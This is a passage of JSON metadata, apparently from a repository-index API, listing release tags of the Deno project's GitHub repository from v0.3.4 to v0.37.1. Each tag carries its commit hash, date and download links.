f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ec